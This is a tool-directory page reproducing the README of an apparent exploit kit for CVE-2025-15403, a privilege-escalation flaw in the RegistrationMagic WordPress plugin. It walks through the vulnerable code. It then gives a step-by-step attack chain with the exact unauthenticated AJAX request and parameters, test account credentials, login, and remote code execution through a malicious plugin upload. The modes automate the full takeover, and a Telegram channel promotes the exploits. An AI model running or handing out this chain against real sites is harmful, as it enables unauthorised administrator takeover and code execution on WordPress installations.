Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-15403 — RegistrationMagic <= 6.0.7.1 - Unauthenticated Privilege Escalation via admin_order | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-15403
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingRed TeamingPayload Development
GitHubnxploited/cve-2025-15403

CVE-2025-15403

RegistrationMagic <= 6.0.7.1 - Unauthenticated Privilege Escalation via admin_order

View Repository
145 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-15403

RegistrationMagic <= 6.0.7.1 - Unauthenticated Privilege Escalation via admin_order

 ,-. .   , ,--.     ,-.   ,-.  ,-.  ;--'      , ;--'   ,.  ,-.  ,--, 
/    |  /  |           ) /  /\    ) |        '| |     / | /  /\   /  
|    | /   |-   ---   /  | / |   /  `-.  ---  | `-.  '--| | / |  `.  
\    |/    |         /   \/  /  /      )      |    )    | \/  /    ) 
 `-' '     `--'     '--'  `-'  '--' `-'       ' `-'     '  `-'  `-'  

Telegram CVE CVSS Python License


📡 The intel drops here first. Follow @KNxploited on Telegram — precision CVE disclosures, working exploits, and deep-dive vulnerability research. The channel for those who don't wait for the news — they make it.


🧠 Overview

CVE-2025-15403 is a CVSS 9.8 Critical Privilege Escalation vulnerability in the RegistrationMagic plugin for WordPress.

The flaw exists in the plugin's add_menu function, exposed unauthenticated via the rm_user_exists AJAX action. By injecting an empty slug into the order parameter alongside the enable_admin_order=yes flag, an attacker manipulates the plugin's internal menu generation logic. When the admin menu is subsequently built, the plugin silently calls add_cap('manage_options') on the target role — elevating any subscriber-tier account to full administrative capability.

FieldDetails
CVE IDCVE-2025-15403
PluginRegistrationMagic
Slugregistrationmagic / custom-registration-form-builder-with-submission-manager
Affected VersionsAll versions up to and including 6.0.7.1
Vulnerability TypeUnauthenticated Privilege Escalation
Attack RequirementAJAX stage: None. Exploitation: Subscriber account
Attack VectorNetwork
CVSS 3.1 Score9.8 CRITICAL
CVSS VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
ImpactFull WordPress Administrator Takeover
ResearcherNxploited

💀 Vulnerability Deep Dive

The root cause is the add_menu function being reachable without authentication through rm_user_exists, combined with zero validation of the admin_order slug:

// Registered with no capability check
add_action('wp_ajax_nopriv_rm_user_exists', [$this, 'rm_user_exists_handler']);

public function rm_user_exists_handler() {
    $slug     = sanitize_text_field($_POST['rm_slug']);
    $order    = $_POST['order'];   // ← User-controlled, NOT sanitized
    $role_key = /* derived from POST */;
    $enable   = $_POST['enable_admin_order'];

    if ($slug === 'rm_options_admin_menu' && $enable === 'yes') {
        // Stores attacker-controlled order into plugin options
        update_option('rm_admin_order', $order);  // e.g. ",menu1" → empty first slug
    }
}

// Later, when admin menu is being built...
public function add_menu() {
    $order = get_option('rm_admin_order');  // ← Poisoned by attacker
    $slugs = explode(',', $order);

    foreach ($slugs as $slug) {
        if (empty($slug)) {
            // Empty slug triggers unconditional capability grant
            $role->add_cap('manage_options');  // ← FULL ADMIN CAPABILITY ADDED
        }
    }
}

Why this is critical:

  • wp_ajax_nopriv_* = zero authentication needed to poison the option
  • Empty slug in order=,menu1 passes empty() check, triggering add_cap('manage_options')
  • manage_options is the highest WordPress capability — equivalent to Administrator
  • Any existing subscriber account immediately gains full admin rights on next admin menu load
  • The AJAX stage requires no prior authentication — making the full chain near-zero barrier

⚔️ Exploit Chain

╔══════════════════════════════════════════════════════════════════════════╗
║  STAGE 1 — Unauthenticated Option Poisoning                             ║
╚══════════════════════════════════════════════════════════════════════════╝

POST /wp-admin/admin-ajax.php

  action            = rm_user_exists
  rm_slug           = rm_options_admin_menu
  order             = ,menu1              ← empty first element = empty slug
  _Subscriber       = 1                  ← target role key
  restore           = false
  enable_admin_order= yes

Response: HTTP 200 (any non-blocked response = option poisoned)

  ↓ Plugin stores order=",menu1" into wp_options
  ↓ Next admin menu build triggers add_cap('manage_options') on Subscriber role

╔══════════════════════════════════════════════════════════════════════════╗
║  STAGE 2 — Account Acquisition (Subscriber)                             ║
╚══════════════════════════════════════════════════════════════════════════╝

Option A — Register via the site's registration form (Mode 0):
  GET  /wp-login.php?action=register  → smart form detection
  POST → create subscriber account
  Credentials: NXploited / xplpass123

Option B — Use an existing subscriber account.

╔══════════════════════════════════════════════════════════════════════════╗
║  STAGE 3 — Login + Capability Harvest                                   ║
╚══════════════════════════════════════════════════════════════════════════╝

POST /wp-login.php
  log = NXploited
  pwd = xplpass123
  ↓
Subscriber account now carries manage_options → full admin panel accessible

╔══════════════════════════════════════════════════════════════════════════╗
║  STAGE 4 — Deep Verification & RCE via Plugin Upload                    ║
╚══════════════════════════════════════════════════════════════════════════╝

GET  /wp-admin/                          → Admin dashboard accessible ✔️
GET  /wp-admin/plugin-install.php        → Plugin install page accessible ✔️
POST /wp-admin/update.php?action=upload-plugin
     pluginzip = Nxploited.zip           → Plugin uploaded & executed ✔️
GET  /wp-content/plugins/Nxploited/hello.php
     Response contains "Nxploited"       → CONFIRMED RCE ✔️

🎯 Operating Modes

This exploit suite provides three distinct modes to cover the full attack lifecycle:

ModeNameDescription
0Register OnlySmart WordPress form detection + subscriber account registration
1Exploit OnlyFires the unauthenticated AJAX primitive to poison admin_order
2Exploit + Login + VerifyFull chain: primitive → login → admin dashboard → plugin install → RCE

⚙️ Requirements

pip install requests colorama urllib3
Download Tool